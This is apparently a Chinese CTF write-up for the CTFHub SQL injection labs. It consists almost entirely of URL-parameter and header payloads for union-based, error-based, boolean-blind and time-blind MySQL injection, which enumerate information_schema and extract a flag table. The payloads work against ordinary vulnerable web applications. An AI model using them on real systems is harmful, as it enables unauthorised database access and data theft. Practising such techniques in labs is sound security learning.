1.整数型注入
?id= - 1 order by 2
?id= - 1 order by 3
?id= - 1 union select 1 , 2
id= - 1 union select 1 , group_concat( schema_name) from information_schema. schemata
?id= - 1 union select 1 , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
id= - 1 union select 1 , group_concat( column_name) from information_schema. columns where table_name= 'flag'
id= - 1 union select 1 , ( select flag from sqli. flag)
2.字符型注入
?id= 1 ' and ' 1 '=' 1 true
?id= 1 ' and ' 1 '=' 2 false
?id= 1 ' order by 2 -- + #存在两个字段
?id=-1' union select database ( ) , user ( )
?id= - 1 ' union select 1,group_concat(schema_name) from information_schema.schemata -- + #数据库
?id=-1' union select 1 , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
?id= - 1 ' union select 1,group_concat(column_name) from information_schema.columns where table_name=' flag' -- + #查询列名
?id=-1' union select 1 , group_concat( flag) from sqli. flag
3.报错注入
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select database ( ) ) , 0x5e24 ) , 1 ) )
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select group_concat( table_name) from information_schema. tables where table_schema= 'sqli' ) , 0x5e24 ) , 1 ) )
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select group_concat( column_name) from information_schema. columns where table_name= 'flag' ) , 0x5e24 ) , 1 ) )
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select group_concat( flag) from sqli. flag) , 0x5e24 ) , 1 ) )
ctfhub{0 b5ac19a8d3f9241fa18ee7 但是不完整
?id= 1 AND ( updatexml( 1 , concat( 0x5e24 , ( select mid ( group_concat( flag) , 20 , 30 ) from sqli. flag) , 0x5e24 ) , 1 ) )
4.布尔注入
?id= 1 and length( database ( ) ) = 4
?id= 1 and ascii( substr( database ( ) , 1 , 1 ) ) > 70
?id= 1 and substr( database ( ) , 1 , 1 ) = 's'
?id= 1 and substr( database ( ) , 2 , 1 ) = 'q'
?id= 1 and substr( database ( ) , 1 , 4 ) = 'sqli'
id= 1 and substr( ( select group_concat( table_name) from information_schema. tables where table_schema= 'sqli' limit 0 , 1 ) , 1 , 1 ) = 'n'
id= 1 and substr( ( select group_concat( table_name) from information_schema. tables where table_schema= 'sqli' limit 0 , 1 ) , 1 , 4 ) = 'news'
?id= 1 and substr( ( select table_name from information_schema. tables where table_schema= 'sqli' limit 1 , 1 ) , 1 , 4 ) = 'flag'
?id= 1 and ascii( substr( ( select column_name from information_schema. columns where table_name= 'flag' ) , 1 , 1 ) ) > 110
id= 1 and ascii( substr( ( select * from sqli. flag where id= 1 ) , 1 , 1 ) ) > 110
?id= 1 and substr( ( select flag from sqli. flag where id= 1 ) , 1 , 1 ) = 'c'
5.时间盲注
步骤和布尔同理
?id= 1 and if ( substr( database ( ) , 1 , 1 ) = 's' , sleep( 5 ) , 1 )
?id= 1 and if ( substr( ( select flag from sqli. flag where id= 1 ) , 1 , 1 ) = 'c' , sleep( 5 ) , 1 )
5.MYSQL结构
和第一、二种类似
?id= - 1 union select database ( ) , group_concat( schema_name) from information_schema. schemata
?id= - 1 union select database ( ) , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
?id= - 1 union select database ( ) , group_concat( column_name) from information_schema. columns where table_name= 'malbfjuabq'
?id= - 1 union select database ( ) , group_concat( cvffvpkrwi) from sqli. malbfjuabq
6.Cookie 注入
和前面类似
Cookie: id= 1 order by 2
7.UA注入
和前面类似
User-Agent: 1 order by 2
8.Referer注入
和前面类似
referer:1 union select 1 , 2
9.过滤空格
?id= 0 union select 1 , database ( )
?id= 0 union select 1 , group_concat( table_name) from information_schema. tables where table_schema= 'sqli'
?id= 0 union select 1 , group_concat( column_name) from information_schema. columns where table_name= 'ssdfpmgfcc'
?id= 0 union select 1 , group_concat( xrnmfbhzqk) from sqli. ssdfpmgfcc